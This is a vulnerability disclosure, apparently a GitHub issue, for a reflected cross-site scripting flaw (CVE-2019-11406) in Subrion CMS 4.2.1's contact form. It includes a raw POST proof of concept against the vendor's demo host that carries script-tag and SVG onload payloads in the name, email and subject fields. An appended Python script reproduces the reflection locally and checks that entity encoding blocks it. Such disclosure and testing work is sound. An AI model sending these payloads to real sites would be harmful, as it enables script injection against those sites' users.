
demos.subrion.org allows _core/en/contacts/ XSS via the name, email, or phone parameter #821

Closed
@alorfm

Description

Title: [Subrion CMS 4.2.1 XSS]

Date: [12-04-2019]

[Vulnerability Type]

Cross Site Scripting (XSS)

Version: [4.2.1]

Tested on:

[Windows, Firefox]

[Affected Product Code Base]

Subrion CMS - 4.2.1

[Affected Component]

parameter: name.
parameter: email.
parameter: phone.
In the contact page

PoC:

POST /_core/en/contacts/ HTTP/1.1
Host: demos.subrion.org
Cookie: INTELLI_cdee4fe56a=glev3hjobu51cvr8kb418sjct2
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded

__st=049b3a26a3737a49eea271c39bced75a&name=%22%3E%3Cscript%3Ealert%28test%29%3C%2Fscript%3E%22%3E&email='"--><Svg OnLoad=confirmK>&phone=&subject='"--><Svg OnLoad=confirmK>&msg=&security_code=



[Impact Code execution]
true


[Attack Vectors]
POST /_core/en/contacts/ HTTP/1.1
Host: demos.subrion.org
Cookie: INTELLI_cdee4fe56a=glev3hjobu51cvr8kb418sjct2
Content-Type: application/x-www-form-urlencoded

__st=049b3a26a3737a49eea271c39bced75a&name=%22%3E%3Cscript%3Ealert%28test%29%3C%2Fscript%3E%22%3E&email='"--><Svg OnLoad=confirmK>&phone=&subject='"--><Svg OnLoad=confirmK>&msg=&security_code=


Author: [Mohammed Alorf - twitter:@_oww]

CVE-2019-11406.
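Added example (not part of the issue above and not Subrion's code): the two payloads in the PoC body are context-breakout strings. The name field decodes to `"><script>alert(test)</script>">`, which closes a quoted attribute and opens a script element; the email and subject fields carry `'"--><Svg OnLoad=confirmK>`, which closes either a quoted attribute or an HTML comment and injects an SVG onload handler (the phone field in the PoC is empty). The script below decodes the PoC body, echoes the fields through a stand-in template that behaves like the vulnerable page (values written into attributes unescaped, an assumption about the affected template, not Subrion's actual code), then through the same template with entity encoding applied (the fix, equivalent to PHP's `htmlspecialchars($v, ENT_QUOTES)`), and uses the standard library HTML parser to list the script elements and on* handlers a browser would see in each. Findings are diffed against a benign submission so that markup legitimately on a page is not counted.

```python
"""Local reproduction of the contact-form reflection and a check of the fix.

Added example, not Subrion's code. The two renderers are stand-ins
(assumptions) for a template that echoes the submitted contact fields back
into the page; the form body is the one from the PoC request.
"""
from collections import Counter
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Body of the PoC request, verbatim (the __st token is the one captured there).
POC_BODY = (
    "__st=049b3a26a3737a49eea271c39bced75a"
    "&name=%22%3E%3Cscript%3Ealert%28test%29%3C%2Fscript%3E%22%3E"
    "&email='\"--><Svg OnLoad=confirmK>&phone="
    "&subject='\"--><Svg OnLoad=confirmK>&msg=&security_code="
)

# Constructed benign submission, used as a baseline so that scripts and
# handlers legitimately present on the page are not reported as injections.
BENIGN_BODY = (
    "__st=0&name=Alice&email=alice%40example.org&phone=&subject=hi"
    "&msg=&security_code="
)


def decode_fields(body):
    """Return the form fields as {name: value}, keeping empty values."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def render_unsafe(fields):
    """Stand-in for the vulnerable behaviour: values echoed into attributes unescaped."""
    return "".join(f'<input name="{k}" value="{v}">\n' for k, v in fields.items())


def render_safe(fields):
    """The fix: entity-encode every echoed value (html.escape encodes & < > " and ')."""
    return "".join(
        f'<input name="{escape(k)}" value="{escape(v)}">\n' for k, v in fields.items()
    )


class _HandlerFinder(HTMLParser):
    """Collects <script> elements and on* event-handler attributes from markup."""

    def __init__(self):
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names, so "OnLoad" arrives as "onload".
        if tag == "script":
            self.found.append("script")
        self.found.extend(f"{tag}@{name}" for name, _ in attrs if name.startswith("on"))


def find_handlers(html):
    """List script elements and event handlers in document order, as a browser would parse them."""
    finder = _HandlerFinder()
    finder.feed(html)
    finder.close()
    return finder.found


def injected(baseline_html, probe_html):
    """Handlers present in the probe response but absent from the benign baseline."""
    delta = Counter(find_handlers(probe_html)) - Counter(find_handlers(baseline_html))
    return sorted(delta.elements())


if __name__ == "__main__":
    poc = decode_fields(POC_BODY)
    benign = decode_fields(BENIGN_BODY)
    print("decoded name field:  ", poc["name"])
    print("unsafe render injects:", injected(render_unsafe(benign), render_unsafe(poc)))
    print("safe render injects:  ", injected(render_safe(benign), render_safe(poc)))
```

Against a live instance the same `injected()` diff works on two real responses: submit the benign body, submit the PoC body, and compare; anything that appears only in the second is reflected input the template failed to encode.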
